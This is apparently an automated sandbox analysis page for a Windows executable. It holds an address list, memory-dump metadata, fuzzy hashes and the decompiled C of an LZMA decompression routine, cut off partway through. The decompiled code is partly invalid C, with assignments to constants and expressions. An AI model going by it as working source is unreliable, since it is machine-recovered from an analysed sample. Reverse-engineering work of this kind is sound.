0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00406428
0x00406428
0x0040642b
0x00000000
0x00000000
0x00406767
0x0040676b
0x0040678d
0x00406790
0x0040679a
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00000000
0x00406819
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x004069b7
0x004069bd
0x004069bf
0x004069c6
0x00000000
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
